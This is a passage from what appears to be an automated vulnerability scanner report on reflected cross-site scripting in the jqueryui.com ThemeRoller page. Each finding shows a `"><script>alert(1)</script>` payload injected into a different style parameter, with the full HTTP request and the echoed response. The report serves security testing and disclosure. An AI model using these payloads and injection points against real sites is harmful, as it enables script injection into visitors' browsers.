GET /themeroller/?ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31c8"><script>alert(1)</script>fa0c014bb49 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent
...[SNIP]...

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd043"><script>alert(1)</script>ac1313806c7 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120068

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&
...[SNIP]...

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc56e"><script>alert(1)</script>b6fd687b91b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_so
...[SNIP]...

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37bd2"><script>alert(1)</script>542322e3a20 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_h
...[SNIP]...

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 121f8"><script>alert(1)</script>339bbf5b28c was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bg
...[SNIP]...

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f680b"><script>alert(1)</script>a08033f67f2 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f99b"><script>alert(1)</script>e7938fcd6a0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.pn
...[SNIP]...

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6309"><script>alert(1)</script>9ad591495d9 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOv
...[SNIP]...

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df23d"><script>alert(1)</script>420d9ca6e8e was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacity